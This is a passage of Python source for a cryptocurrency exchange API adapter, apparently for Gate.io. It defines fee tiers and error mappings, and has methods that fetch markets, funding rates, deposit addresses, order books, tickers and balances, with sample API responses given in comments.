'feeSide': 'base', 'percentage': True, 'maker': self.parse_number('0.0'), 'taker': self.parse_number('0.0005'), 'tiers': { 'maker': [ [self.parse_number('0'), self.parse_number('0.0000')], [self.parse_number('1.5'), self.parse_number('-0.00005')], [self.parse_number('3'), self.parse_number('-0.00005')], [self.parse_number('6'), self.parse_number('-0.00005')], [self.parse_number('12.5'), self.parse_number('-0.00005')], [self.parse_number('25'), self.parse_number('-0.00005')], [self.parse_number('75'), self.parse_number('-0.00005')], [self.parse_number('200'), self.parse_number('-0.00005')], [self.parse_number('500'), self.parse_number('-0.00005')], [self.parse_number('1250'), self.parse_number('-0.00005')], [self.parse_number('2500'), self.parse_number('-0.00005')], [self.parse_number('3000'), self.parse_number('-0.00008')], [self.parse_number('6000'), self.parse_number('-0.01000')], [self.parse_number('11000'), self.parse_number('-0.01002')], [self.parse_number('20000'), self.parse_number('-0.01005')], [self.parse_number('40000'), self.parse_number('-0.02000')], [self.parse_number('75000'), self.parse_number('-0.02005')], ], 'taker': [ [self.parse_number('0'), self.parse_number('0.00050')], [self.parse_number('1.5'), self.parse_number('0.00048')], [self.parse_number('3'), self.parse_number('0.00046')], [self.parse_number('6'), self.parse_number('0.00044')], [self.parse_number('12.5'), self.parse_number('0.00042')], [self.parse_number('25'), self.parse_number('0.00040')], [self.parse_number('75'), self.parse_number('0.00038')], [self.parse_number('200'), self.parse_number('0.00036')], [self.parse_number('500'), self.parse_number('0.00034')], [self.parse_number('1250'), self.parse_number('0.00032')], [self.parse_number('2500'), self.parse_number('0.00030')], [self.parse_number('3000'), self.parse_number('0.00030')], [self.parse_number('6000'), self.parse_number('0.00030')], [self.parse_number('11000'), self.parse_number('0.00030')], [self.parse_number('20000'), self.parse_number('0.00030')], [self.parse_number('40000'), self.parse_number('0.00030')], [self.parse_number('75000'), self.parse_number('0.00030')], ], }, }, }, # https://www.gate.io/docs/apiv4/en/index.html#label-list 'exceptions': { 'INVALID_PARAM_VALUE': BadRequest, 'INVALID_PROTOCOL': BadRequest, 'INVALID_ARGUMENT': BadRequest, 'INVALID_REQUEST_BODY': BadRequest, 'MISSING_REQUIRED_PARAM': ArgumentsRequired, 'BAD_REQUEST': BadRequest, 'INVALID_CONTENT_TYPE': BadRequest, 'NOT_ACCEPTABLE': BadRequest, 'METHOD_NOT_ALLOWED': BadRequest, 'NOT_FOUND': ExchangeError, 'INVALID_CREDENTIALS': AuthenticationError, 'INVALID_KEY': AuthenticationError, 'IP_FORBIDDEN': AuthenticationError, 'READ_ONLY': PermissionDenied, 'INVALID_SIGNATURE': AuthenticationError, 'MISSING_REQUIRED_HEADER': AuthenticationError, 'REQUEST_EXPIRED': AuthenticationError, 'ACCOUNT_LOCKED': AccountSuspended, 'FORBIDDEN': PermissionDenied, 'SUB_ACCOUNT_NOT_FOUND': ExchangeError, 'SUB_ACCOUNT_LOCKED': AccountSuspended, 'MARGIN_BALANCE_EXCEPTION': ExchangeError, 'MARGIN_TRANSFER_FAILED': ExchangeError, 'TOO_MUCH_FUTURES_AVAILABLE': ExchangeError, 'FUTURES_BALANCE_NOT_ENOUGH': InsufficientFunds, 'ACCOUNT_EXCEPTION': ExchangeError, 'SUB_ACCOUNT_TRANSFER_FAILED': ExchangeError, 'ADDRESS_NOT_USED': ExchangeError, 'TOO_FAST': RateLimitExceeded, 'WITHDRAWAL_OVER_LIMIT': ExchangeError, 'API_WITHDRAW_DISABLED': ExchangeNotAvailable, 'INVALID_WITHDRAW_ID': ExchangeError, 'INVALID_WITHDRAW_CANCEL_STATUS': ExchangeError, 'INVALID_PRECISION': InvalidOrder, 'INVALID_CURRENCY': BadSymbol, 'INVALID_CURRENCY_PAIR': BadSymbol, 'POC_FILL_IMMEDIATELY': ExchangeError, 'ORDER_NOT_FOUND': OrderNotFound, 'ORDER_CLOSED': InvalidOrder, 'ORDER_CANCELLED': InvalidOrder, 'QUANTITY_NOT_ENOUGH': InvalidOrder, 'BALANCE_NOT_ENOUGH': InsufficientFunds, 'MARGIN_NOT_SUPPORTED': InvalidOrder, 'MARGIN_BALANCE_NOT_ENOUGH': InsufficientFunds, 'AMOUNT_TOO_LITTLE': InvalidOrder, 'AMOUNT_TOO_MUCH': InvalidOrder, 'REPEATED_CREATION': InvalidOrder, 'LOAN_NOT_FOUND': OrderNotFound, 'LOAN_RECORD_NOT_FOUND': OrderNotFound, 'NO_MATCHED_LOAN': ExchangeError, 'NOT_MERGEABLE': ExchangeError, 'NO_CHANGE': ExchangeError, 'REPAY_TOO_MUCH': ExchangeError, 'TOO_MANY_CURRENCY_PAIRS': InvalidOrder, 'TOO_MANY_ORDERS': InvalidOrder, 'MIXED_ACCOUNT_TYPE': InvalidOrder, 'AUTO_BORROW_TOO_MUCH': ExchangeError, 'TRADE_RESTRICTED': InsufficientFunds, 'USER_NOT_FOUND': ExchangeError, 'CONTRACT_NO_COUNTER': ExchangeError, 'CONTRACT_NOT_FOUND': BadSymbol, 'RISK_LIMIT_EXCEEDED': ExchangeError, 'INSUFFICIENT_AVAILABLE': InsufficientFunds, 'LIQUIDATE_IMMEDIATELY': InvalidOrder, 'LEVERAGE_TOO_HIGH': InvalidOrder, 'LEVERAGE_TOO_LOW': InvalidOrder, 'ORDER_NOT_OWNED': ExchangeError, 'ORDER_FINISHED': ExchangeError, 'POSITION_CROSS_MARGIN': ExchangeError, 'POSITION_IN_LIQUIDATION': ExchangeError, 'POSITION_IN_CLOSE': ExchangeError, 'POSITION_EMPTY': InvalidOrder, 'REMOVE_TOO_MUCH': ExchangeError, 'RISK_LIMIT_NOT_MULTIPLE': ExchangeError, 'RISK_LIMIT_TOO_HIGH': ExchangeError, 'RISK_LIMIT_TOO_lOW': ExchangeError, 'PRICE_TOO_DEVIATED': InvalidOrder, 'SIZE_TOO_LARGE': InvalidOrder, 'SIZE_TOO_SMALL': InvalidOrder, 'PRICE_OVER_LIQUIDATION': InvalidOrder, 'PRICE_OVER_BANKRUPT': InvalidOrder, 'ORDER_POC_IMMEDIATE': InvalidOrder, 'INCREASE_POSITION': InvalidOrder, 'CONTRACT_IN_DELISTING': ExchangeError, 'INTERNAL': ExchangeError, 'SERVER_ERROR': ExchangeError, 'TOO_BUSY': ExchangeNotAvailable, }, }) def fetch_markets(self, params={}): # :param params['type']: 'spot', 'margin', 'futures' or 'delivery' # :param params['settle']: The quote currency defaultType = self.safe_string_2(self.options, 'fetchMarkets', 'defaultType', 'spot') type = self.safe_string(params, 'type', defaultType) query = self.omit(params, 'type') spot = (type == 'spot') margin = (type == 'margin') futures = (type == 'futures') swap = (type == 'swap') option = (type == 'option') if not spot and not margin and not futures and not swap: raise ExchangeError(self.id + " does not support '" + type + "' type, set exchange.options['defaultType'] to " + "'spot', 'margin', 'swap' or 'futures'") # eslint-disable-line quotes response = None result = [] method = self.get_supported_mapping(type, { 'spot': 'publicSpotGetCurrencyPairs', 'margin': 'publicMarginGetCurrencyPairs', 'swap': 'publicFuturesGetSettleContracts', 'futures': 'publicDeliveryGetSettleContracts', }) if swap or futures or option: settlementCurrencies = self.get_settlement_currencies(type, 'fetchMarkets') for c in range(0, len(settlementCurrencies)): settle = settlementCurrencies[c] query['settle'] = settle response = getattr(self, method)(query) # Perpetual swap # [ # { # "name": "BTC_USDT", # "type": "direct", # "quanto_multiplier": "0.0001", # "ref_discount_rate": "0", # "order_price_deviate": "0.5", # "maintenance_rate": "0.005", # "mark_type": "index", # "last_price": "38026", # "mark_price": "37985.6", # "index_price": "37954.92", # "funding_rate_indicative": "0.000219", # "mark_price_round": "0.01", # "funding_offset": 0, # "in_delisting": False, # "risk_limit_base": "1000000", # "interest_rate": "0.0003", # "order_price_round": "0.1", # "order_size_min": 1, # "ref_rebate_rate": "0.2", # "funding_interval": 28800, # "risk_limit_step": "1000000", # "leverage_min": "1", # "leverage_max": "100", # "risk_limit_max": "8000000", # "maker_fee_rate": "-0.00025", # "taker_fee_rate": "0.00075", # "funding_rate": "0.002053", # "order_size_max": 1000000, # "funding_next_apply": 1610035200, # "short_users": 977, # "config_change_time": 1609899548, # "trade_size": 28530850594, # "position_size": 5223816, # "long_users": 455, # "funding_impact_value": "60000", # "orders_limit": 50, # "trade_id": 10851092, # "orderbook_id": 2129638396 # } # ] # # Delivery Futures # [ # { # "name": "BTC_USDT_20200814", # "underlying": "BTC_USDT", # "cycle": "WEEKLY", # "type": "direct", # "quanto_multiplier": "0.0001", # "mark_type": "index", # "last_price": "9017", # "mark_price": "9019", # "index_price": "9005.3", # "basis_rate": "0.185095", # "basis_value": "13.7", # "basis_impact_value": "100000", # "settle_price": "0", # "settle_price_interval": 60, # "settle_price_duration": 1800, # "settle_fee_rate": "0.0015", # "expire_time": 1593763200, # "order_price_round": "0.1", # "mark_price_round": "0.1", # "leverage_min": "1", # "leverage_max": "100", # "maintenance_rate": "1000000", # "risk_limit_base": "140.726652109199", # "risk_limit_step": "1000000", # "risk_limit_max": "8000000", # "maker_fee_rate": "-0.00025", # "taker_fee_rate": "0.00075", # "ref_discount_rate": "0", # "ref_rebate_rate": "0.2", # "order_price_deviate": "0.5", # "order_size_min": 1, # "order_size_max": 1000000, # "orders_limit": 50, # "orderbook_id": 63, # "trade_id": 26, # "trade_size": 435, # "position_size": 130, # "config_change_time": 1593158867, # "in_delisting": False # } # ] # for i in range(0, len(response)): market = response[i] id = self.safe_string(market, 'name') baseId, quoteId, date = id.split('_') linear = quoteId.lower() == settle inverse = baseId.lower() == settle base = self.safe_currency_code(baseId) quote = self.safe_currency_code(quoteId) symbol = '' if date: symbol = base + '/' + quote + '-' + date + ':' + self.safe_currency_code(settle) else: symbol = base + '/' + quote + ':' + self.safe_currency_code(settle) priceDeviate = self.safe_string(market, 'order_price_deviate') markPrice = self.safe_string(market, 'mark_price') minMultiplier = Precise.string_sub('1', priceDeviate) maxMultiplier = Precise.string_add('1', priceDeviate) minPrice = Precise.string_mul(minMultiplier, markPrice) maxPrice = Precise.string_mul(maxMultiplier, markPrice) takerPercent = self.safe_string(market, 'taker_fee_rate') makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent) feeIndex = 'swap' if (type == 'futures') else type pricePrecision = self.safe_number(market, 'order_price_round') result.append({ 'info': market, 'id': id, 'baseId': baseId, 'quoteId': quoteId, 'settleId': self.safe_symbol(settle), 'base': base, 'quote': quote, 'symbol': symbol, 'type': type, 'spot': spot, 'margin': margin, 'futures': futures, 'swap': swap, 'option': option, 'derivative': True, 'contract': True, 'linear': linear, 'inverse': inverse, # Fee is in %, so divide by 100 'taker': self.parse_number(Precise.string_div(takerPercent, '100')), 'maker': self.parse_number(Precise.string_div(makerPercent, '100')), 'contractSize': self.safe_string(market, 'quanto_multiplier'), 'precision': { 'amount': self.parse_number('1'), 'price': pricePrecision, }, 'limits': { 'leverage': { 'min': self.safe_number(market, 'leverage_min'), 'max': self.safe_number(market, 'leverage_max'), }, 'amount': { 'min': self.safe_number(market, 'order_size_min'), 'max': self.safe_number(market, 'order_size_max'), }, 'price': { 'min': minPrice, 'max': maxPrice, }, }, 'expiry': self.safe_integer(market, 'expire_time'), 'fees': self.safe_value(self.fees, feeIndex, {}), }) else: response = getattr(self, method)(query) # # Spot # [ # { # "id": "DEGO_USDT", # "base": "DEGO", # "quote": "USDT", # "fee": "0.2", # "min_quote_amount": "1", # "amount_precision": "4", # "precision": "4", # "trade_status": "tradable", # "sell_start": "0", # "buy_start": "0" # } # ] # # Margin # [ # { # "id": "ETH_USDT", # "base": "ETH", # "quote": "USDT", # "leverage": 3, # "min_base_amount": "0.01", # "min_quote_amount": "100", # "max_quote_amount": "1000000" # } # ] # for i in range(0, len(response)): market = response[i] id = self.safe_string(market, 'id') spot = (type == 'spot') futures = (type == 'futures') swap = (type == 'swap') option = (type == 'option') baseId, quoteId = id.split('_') base = self.safe_currency_code(baseId) quote = self.safe_currency_code(quoteId) symbol = base + '/' + quote takerPercent = self.safe_string(market, 'fee') makerPercent = self.safe_string(market, 'maker_fee_rate', takerPercent) amountPrecisionString = self.safe_string(market, 'amount_precision') pricePrecisionString = self.safe_string(market, 'precision') amountPrecision = self.parse_number(self.parse_precision(amountPrecisionString)) pricePrecision = self.parse_number(self.parse_precision(pricePrecisionString)) tradeStatus = self.safe_string(market, 'trade_status') result.append({ 'info': market, 'id': id, 'baseId': baseId, 'quoteId': quoteId, 'base': base, 'quote': quote, 'symbol': symbol, 'type': type, 'spot': spot, 'margin': margin, 'futures': futures, 'swap': swap, 'option': option, 'contract': False, 'derivative': False, 'linear': False, 'inverse': False, # Fee is in %, so divide by 100 'taker': self.parse_number(Precise.string_div(takerPercent, '100')), 'maker': self.parse_number(Precise.string_div(makerPercent, '100')), 'precision': { 'amount': amountPrecision, 'price': pricePrecision, }, 'active': tradeStatus == 'tradable', 'limits': { 'amount': { 'min': amountPrecision, 'max': None, }, 'price': { 'min': pricePrecision, 'max': None, }, 'cost': { 'min': self.safe_number(market, 'min_quote_amount'), 'max': None, }, 'leverage': { 'max': self.safe_number(market, 'lever', 1), }, }, }) return result def prepare_request(self, market): if market['contract']: return { 'contract': market['id'], 'settle': market['settleId'], } else: return { 'currency_pair': market['id'], } def get_settlement_currencies(self, type, method): options = self.safe_value(self.options, type, {}) # ['BTC', 'USDT'] unified codes fetchMarketsContractOptions = self.safe_value(options, method, {}) defaultSettle = type == ['usdt'] if 'swap' else ['btc'] return self.safe_value(fetchMarketsContractOptions, 'settlementCurrencies', defaultSettle) def fetch_currencies(self, params={}): response = self.publicSpotGetCurrencies(params) # # { # "currency": "BCN", # "delisted": False, # "withdraw_disabled": True, # "withdraw_delayed": False, # "deposit_disabled": True, # "trade_disabled": False # } # result = {} # TODO: remove magic constants amountPrecision = self.parse_number('1e-6') for i in range(0, len(response)): entry = response[i] currencyId = self.safe_string(entry, 'currency') code = self.safe_currency_code(currencyId) delisted = self.safe_value(entry, 'delisted') withdraw_disabled = self.safe_value(entry, 'withdraw_disabled') deposit_disabled = self.safe_value(entry, 'disabled_disabled') trade_disabled = self.safe_value(entry, 'trade_disabled') active = not (delisted and withdraw_disabled and deposit_disabled and trade_disabled) result[code] = { 'id': currencyId, 'name': None, 'code': code, 'precision': amountPrecision, 'info': entry, 'active': active, 'fee': None, 'fees': [], 'limits': self.limits, } return result def fetch_funding_rate(self, symbol, params={}): self.load_markets() market = self.market(symbol) request = { 'contract': market['id'], 'settle': market['quote'].lower(), } response = self.publicFuturesGetSettleContractsContract(self.extend(request, params)) # # [ # { # "name": "BTC_USDT", # "type": "direct", # "quanto_multiplier": "0.0001", # "ref_discount_rate": "0", # "order_price_deviate": "0.5", # "maintenance_rate": "0.005", # "mark_type": "index", # "last_price": "38026", # "mark_price": "37985.6", # "index_price": "37954.92", # "funding_rate_indicative": "0.000219", # "mark_price_round": "0.01", # "funding_offset": 0, # "in_delisting": False, # "risk_limit_base": "1000000", # "interest_rate": "0.0003", # "order_price_round": "0.1", # "order_size_min": 1, # "ref_rebate_rate": "0.2", # "funding_interval": 28800, # "risk_limit_step": "1000000", # "leverage_min": "1", # "leverage_max": "100", # "risk_limit_max": "8000000", # "maker_fee_rate": "-0.00025", # "taker_fee_rate": "0.00075", # "funding_rate": "0.002053", # "order_size_max": 1000000, # "funding_next_apply": 1610035200, # "short_users": 977, # "config_change_time": 1609899548, # "trade_size": 28530850594, # "position_size": 5223816, # "long_users": 455, # "funding_impact_value": "60000", # "orders_limit": 50, # "trade_id": 10851092, # "orderbook_id": 2129638396 # } # ] # return self.parse_funding_rate(response) def fetch_funding_rates(self, symbols=None, params={}): self.load_markets() settle = self.safe_string(params, 'settle') # TODO: Save settle in markets? request = { 'settle': settle.lower(), } response = self.publicFuturesGetSettleContracts(self.extend(request, params)) # # [ # { # "name": "BTC_USDT", # "type": "direct", # "quanto_multiplier": "0.0001", # "ref_discount_rate": "0", # "order_price_deviate": "0.5", # "maintenance_rate": "0.005", # "mark_type": "index", # "last_price": "38026", # "mark_price": "37985.6", # "index_price": "37954.92", # "funding_rate_indicative": "0.000219", # "mark_price_round": "0.01", # "funding_offset": 0, # "in_delisting": False, # "risk_limit_base": "1000000", # "interest_rate": "0.0003", # "order_price_round": "0.1", # "order_size_min": 1, # "ref_rebate_rate": "0.2", # "funding_interval": 28800, # "risk_limit_step": "1000000", # "leverage_min": "1", # "leverage_max": "100", # "risk_limit_max": "8000000", # "maker_fee_rate": "-0.00025", # "taker_fee_rate": "0.00075", # "funding_rate": "0.002053", # "order_size_max": 1000000, # "funding_next_apply": 1610035200, # "short_users": 977, # "config_change_time": 1609899548, # "trade_size": 28530850594, # "position_size": 5223816, # "long_users": 455, # "funding_impact_value": "60000", # "orders_limit": 50, # "trade_id": 10851092, # "orderbook_id": 2129638396 # } # ] # result = self.parse_funding_rates(response) return self.filter_by_array(result, 'symbol', symbols) def parse_funding_rate(self, contract, market=None): # # { # "name": "BTC_USDT", # "type": "direct", # "quanto_multiplier": "0.0001", # "ref_discount_rate": "0", # "order_price_deviate": "0.5", # "maintenance_rate": "0.005", # "mark_type": "index", # "last_price": "38026", # "mark_price": "37985.6", # "index_price": "37954.92", # "funding_rate_indicative": "0.000219", # "mark_price_round": "0.01", # "funding_offset": 0, # "in_delisting": False, # "risk_limit_base": "1000000", # "interest_rate": "0.0003", # "order_price_round": "0.1", # "order_size_min": 1, # "ref_rebate_rate": "0.2", # "funding_interval": 28800, # "risk_limit_step": "1000000", # "leverage_min": "1", # "leverage_max": "100", # "risk_limit_max": "8000000", # "maker_fee_rate": "-0.00025", # "taker_fee_rate": "0.00075", # "funding_rate": "0.002053", # "order_size_max": 1000000, # "funding_next_apply": 1610035200, # "short_users": 977, # "config_change_time": 1609899548, # "trade_size": 28530850594, # "position_size": 5223816, # "long_users": 455, # "funding_impact_value": "60000", # "orders_limit": 50, # "trade_id": 10851092, # "orderbook_id": 2129638396 # } # marketId = self.safe_string(contract, 'name') symbol = self.safe_symbol(marketId, market) markPrice = self.safe_number(contract, 'mark_price') indexPrice = self.safe_number(contract, 'index_price') interestRate = self.safe_number(contract, 'interest_rate') fundingRate = self.safe_string(contract, 'funding_rate') fundingInterval = self.safe_string(contract, 'funding_interval') * 1000 nextFundingTime = self.safe_integer(contract, 'funding_next_apply') * 1000 previousFundingTime = (self.safe_number(contract, 'funding_next_apply') * 1000) - fundingInterval fundingRateIndicative = self.safe_number(contract, 'funding_rate_indicative') timestamp = self.milliseconds() return { 'info': contract, 'symbol': symbol, 'markPrice': markPrice, 'indexPrice': indexPrice, 'interestRate': interestRate, 'estimatedSettlePrice': None, 'timestamp': timestamp, 'datetime': self.iso8601(timestamp), 'previousFundingRate': fundingRate, 'nextFundingRate': fundingRateIndicative, 'previousFundingTimestamp': previousFundingTime, 'nextFundingTimestamp': nextFundingTime, 'previousFundingDatetime': self.iso8601(previousFundingTime), 'nextFundingDatetime': self.iso8601(nextFundingTime), } def fetch_network_deposit_address(self, code, params={}): self.load_markets() currency = self.currency(code) request = { 'currency': currency['id'], } response = self.privateWalletGetDepositAddress(self.extend(request, params)) addresses = self.safe_value(response, 'multichain_addresses') currencyId = self.safe_string(response, 'currency') code = self.safe_currency_code(currencyId) result = {} for i in range(0, len(addresses)): entry = addresses[i] # # { # "chain": "ETH", # "address": "0x359a697945E79C7e17b634675BD73B33324E9408", # "payment_id": "", # "payment_name": "", # "obtain_failed": "0" # } # obtainFailed = self.safe_integer(entry, 'obtain_failed') if obtainFailed: continue network = self.safe_string(entry, 'chain') address = self.safe_string(entry, 'address') tag = self.safe_string(entry, 'payment_id') tagLength = len(tag) tag = tag if tagLength else None result[network] = { 'info': entry, 'code': code, 'address': address, 'tag': tag, } return result def fetch_deposit_address(self, code, params={}): self.load_markets() currency = self.currency(code) request = { 'currency': currency['id'], } response = self.privateWalletGetDepositAddress(self.extend(request, params)) # # { # "currency": "XRP", # "address": "rHcFoo6a9qT5NHiVn1THQRhsEGcxtYCV4d 391331007", # "multichain_addresses": [ # { # "chain": "XRP", # "address": "rHcFoo6a9qT5NHiVn1THQRhsEGcxtYCV4d", # "payment_id": "391331007", # "payment_name": "Tag", # "obtain_failed": 0 # } # ] # } # currencyId = self.safe_string(response, 'currency') code = self.safe_currency_code(currencyId) addressField = self.safe_string(response, 'address') tag = None address = None if addressField.find(' ') >= 0: splitted = addressField.split(' ') address = splitted[0] tag = splitted[1] else: address = addressField return { 'info': response, 'code': code, 'address': address, 'tag': tag, 'network': None, } def fetch_trading_fees(self, params={}): self.load_markets() response = self.privateWalletGetFee(params) # # { # "user_id": 1486602, # "taker_fee": "0.002", # "maker_fee": "0.002", # "gt_discount": True, # "gt_taker_fee": "0.0015", # "gt_maker_fee": "0.0015", # "loan_fee": "0.18", # "point_type": "0", # "futures_taker_fee": "0.0005", # "futures_maker_fee": "0" # } # result = {} taker = self.safe_number(response, 'taker_fee') maker = self.safe_number(response, 'maker_fee') for i in range(0, len(self.symbols)): symbol = self.symbols[i] result[symbol] = { 'maker': maker, 'taker': taker, 'info': response, 'symbol': symbol, } return result def fetch_funding_fees(self, params={}): self.load_markets() response = self.privateWalletGetWithdrawStatus(params) # # { # "currency": "MTN", # "name": "Medicalchain", # "name_cn": "Medicalchain", # "deposit": "0", # "withdraw_percent": "0%", # "withdraw_fix": "900", # "withdraw_day_limit": "500000", # "withdraw_day_limit_remain": "500000", # "withdraw_amount_mini": "900.1", # "withdraw_eachtime_limit": "90000000000", # "withdraw_fix_on_chains": { # "ETH": "900" # } # } # withdrawFees = {} for i in range(0, len(response)): entry = response[i] currencyId = self.safe_string(entry, 'currency') code = self.safe_currency_code(currencyId) withdrawFees[code] = {} withdrawFix = self.safe_value(entry, 'withdraw_fix_on_chains') if withdrawFix is None: withdrawFix = {} withdrawFix[code] = self.safe_number(entry, 'withdraw_fix') keys = list(withdrawFix.keys()) for i in range(0, len(keys)): key = keys[i] withdrawFees[code][key] = self.parse_number(withdrawFix[key]) return { 'info': response, 'withdraw': withdrawFees, 'deposit': {}, } def fetch_funding_history(self, symbol=None, since=None, limit=None, params={}): self.load_markets() # defaultType = 'future' if symbol is None: raise ArgumentsRequired(self.id + ' fetchFundingHistory() requires the argument "symbol"') market = self.market(symbol) request = self.prepare_request(market) request['type'] = 'fund' # 'dnw' 'pnl' 'fee' 'refr' 'fund' 'point_dnw' 'point_fee' 'point_refr' if since is not None: request['from'] = since if limit is not None: request['limit'] = limit method = self.get_supported_mapping(market['type'], { 'swap': 'privateFuturesGetSettleAccountBook', 'futures': 'privateDeliveryGetSettleAccountBook', }) response = getattr(self, method)(self.extend(request, params)) result = [] for i in range(0, len(response)): entry = response[i] timestamp = self.safe_timestamp(entry, 'time') result.append({ 'info': entry, 'symbol': symbol, 'code': self.safe_currency_code(self.safe_string(entry, 'text')), 'timestamp': timestamp, 'datetime': self.iso8601(timestamp), 'id': None, 'amount': self.safe_number(entry, 'change'), }) return result def fetch_order_book(self, symbol, limit=None, params={}): self.load_markets() market = self.market(symbol) # # request = { # 'currency_pair': market['id'], # 'interval': '0', # depth, 0 means no aggregation is applied, default to 0 # 'limit': limit, # maximum number of order depth data in asks or bids # 'with_id': True, # return order book ID # } # request = self.prepare_request(market) spot = market['spot'] method = self.get_supported_mapping(market['type'], { 'spot': 'publicSpotGetOrderBook', # 'margin': 'publicMarginGetOrderBook', 'swap': 'publicFuturesGetSettleOrderBook', 'futures': 'publicDeliveryGetSettleOrderBook', }) if limit is not None: request['limit'] = limit # default 10, max 100 response = getattr(self, method)(self.extend(request, params)) # # SPOT # # { # "current": 1634345973275, # "update": 1634345973271, # "asks": [ # ["2.2241","12449.827"], # ["2.2242","200"], # ["2.2244","826.931"], # ["2.2248","3876.107"], # ["2.225","2377.252"], # ["2.22509","439.484"], # ["2.2251","1489.313"], # ["2.2253","714.582"], # ["2.2254","1349.784"], # ["2.2256","234.701"]], # "bids":[ # ["2.2236","32.465"], # ["2.2232","243.983"], # ["2.2231","32.207"], # ["2.223","449.827"], # ["2.2228","7.918"], # ["2.2227","12703.482"], # ["2.2226","143.033"], # ["2.2225","143.027"], # ["2.2224","1369.352"], # ["2.2223","756.063"] # ] # } # # Perpetual Swap # # { # "current": 1634350208.745, # "asks": [ # {"s":24909,"p": "61264.8"}, # {"s":81,"p": "61266.6"}, # {"s":2000,"p": "61267.6"}, # {"s":490,"p": "61270.2"}, # {"s":12,"p": "61270.4"}, # {"s":11782,"p": "61273.2"}, # {"s":14666,"p": "61273.3"}, # {"s":22541,"p": "61273.4"}, # {"s":33,"p": "61273.6"}, # {"s":11980,"p": "61274.5"} # ], # "bids": [ # {"s":41844,"p": "61264.7"}, # {"s":13783,"p": "61263.3"}, # {"s":1143,"p": "61259.8"}, # {"s":81,"p": "61258.7"}, # {"s":2471,"p": "61257.8"}, # {"s":2471,"p": "61257.7"}, # {"s":2471,"p": "61256.5"}, # {"s":3,"p": "61254.2"}, # {"s":114,"p": "61252.4"}, # {"s":14372,"p": "61248.6"} # ], # "update": 1634350208.724 # } # timestamp = self.safe_integer(response, 'current') if not spot: timestamp = timestamp * 1000 priceKey = 0 if spot else 'p' amountKey = 1 if spot else 's' return self.parse_order_book(response, symbol, timestamp, 'bids', 'asks', priceKey, amountKey) def fetch_ticker(self, symbol, params={}): self.load_markets() market = self.market(symbol) request = self.prepare_request(market) method = self.get_supported_mapping(market['type'], { 'spot': 'publicSpotGetTickers', # 'margin': 'publicMarginGetTickers', 'swap': 'publicFuturesGetSettleTickers', 'futures': 'publicDeliveryGetSettleTickers', }) response = getattr(self, method)(self.extend(request, params)) ticker = self.safe_value(response, 0) return self.parse_ticker(ticker, market) def parse_ticker(self, ticker, market=None): # # SPOT # # { # "currency_pair": "KFC_USDT", # "last": "7.255", # "lowest_ask": "7.298", # "highest_bid": "7.218", # "change_percentage": "-1.18", # "base_volume": "1219.053687865", # "quote_volume": "8807.40299875455", # "high_24h": "7.262", # "low_24h": "7.095" # } # # LINEAR/DELIVERY # # { # "contract": "BTC_USDT", # "last": "6432", # "low_24h": "6278", # "high_24h": "6790", # "change_percentage": "4.43", # "total_size": "32323904", # "volume_24h": "184040233284", # "volume_24h_btc": "28613220", # "volume_24h_usd": "184040233284", # "volume_24h_base": "28613220", # "volume_24h_quote": "184040233284", # "volume_24h_settle": "28613220", # "mark_price": "6534", # "funding_rate": "0.0001", # "funding_rate_indicative": "0.0001", # "index_price": "6531" # } # marketId = self.safe_string_2(ticker, 'currency_pair', 'contract') symbol = self.safe_symbol(marketId, market) last = self.safe_number(ticker, 'last') ask = self.safe_number(ticker, 'lowest_ask') bid = self.safe_number(ticker, 'highest_bid') high = self.safe_number(ticker, 'high_24h') low = self.safe_number(ticker, 'low_24h') baseVolume = self.safe_number(ticker, 'base_volume', 'volume_24h_base') quoteVolume = self.safe_number(ticker, 'quote_volume', 'volume_24h_quote') percentage = self.safe_number(ticker, 'change_percentage') return self.safe_ticker({ 'symbol': symbol, 'timestamp': None, 'datetime': None, 'high': high, 'low': low, 'bid': bid, 'bidVolume': None, 'ask': ask, 'askVolume': None, 'vwap': None, 'open': None, 'close': last, 'last': last, 'previousClose': None, 'change': None, 'percentage': percentage, 'average': None, 'baseVolume': baseVolume, 'quoteVolume': quoteVolume, 'info': ticker, }, market) def fetch_tickers(self, symbols=None, params={}): self.load_markets() defaultType = self.safe_string_2(self.options, 'fetchTickers', 'defaultType', 'spot') type = self.safe_string(params, 'type', defaultType) params = self.omit(params, 'type') method = self.get_supported_mapping(type, { 'spot': 'publicSpotGetTickers', # 'margin': 'publicMarginGetTickers', 'swap': 'publicFuturesGetSettleTickers', 'futures': 'publicDeliveryGetSettleTickers', }) request = {} futures = type == 'futures' swap = type == 'swap' if (swap or futures) and not params['settle']: request['settle'] = 'usdt' if swap else 'btc' response = getattr(self, method)(self.extend(request, params)) return self.parse_tickers(response, symbols) def fetch_balance(self, params={}): # :param params.type: spot, margin, crossMargin, swap or future # :param params.settle: Settle currency(usdt or btc) for perpetual swap and futures self.load_markets() defaultType = self.safe_string_2(self.options, 'fetchBalance', 'defaultType', 'spot') type = self.safe_string(params, 'type', defaultType) params = self.omit(params, 'type') swap = type == 'swap' futures = type == 'futures' method = self.get_supported_mapping(type, { 'spot': 'privateSpotGetAccounts', # 'margin': 'publicMarginGetTickers', 'swap': 'privateFuturesGetSettleAccounts', 'futures': 'privateDeliveryGetSettleAccounts', }) request = {} response = [] if swap or futures: defaultSettle = 'usdt' if swap else 'btc' request['settle'] = self.safe_string(params, 'settle', defaultSettle) response_item = getattr(self, method)(self.extend(request, params)) response = [response_item] else: response = getattr(self, method)(self.extend(request, params)) # SPOT # [ # { # "currency": "DBC", # "available": "0", # "locked": "0" # }, # ... # ] # # Perpetual Swap # { # order_margin: "0", # point: "0", # bonus: "0", # history: { # dnw: "2.1321", # pnl: "11.5351", # refr: "0", # point_fee: "0", # fund: "-0.32340576684", # bonus_dnw: "0", # point_refr: "0", # bonus_offset: "0", # fee: "-0.20132775", # point_dnw: "0", # }, # unrealised_pnl: "13.315100000006", # total: "12.51345151332", # available: "0", # in_dual_mode: False, # currency: "USDT", # position_margin: "12.51345151332", # user: "6333333", # } # # Delivery Future # { # order_margin: "0", # point: "0", # history: { # dnw: "1", # pnl: "0", # refr: "0", # point_fee: "0", # point_dnw: "0", # settle: "0", # settle_fee: "0", # point_refr: "0", # fee: "0", # }, # unrealised_pnl: "0", # total: "1", # available: "1", # currency: "USDT", # position_margin: "0", # user: "6333333", # } result = {} for i in range(0, len(response)): entry = response[i] account = self.account() currencyId = self.safe_string(entry, 'currency') code = self.safe_currency_code(currencyId) account['used'] = self.safe_string_2(entry, 'locked', 'position_margin') account['free'] = self.safe_string(entry, 'available') result[code] = account return self.parse_balance(result) def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}): self.load_markets() market = self.market(symbol) 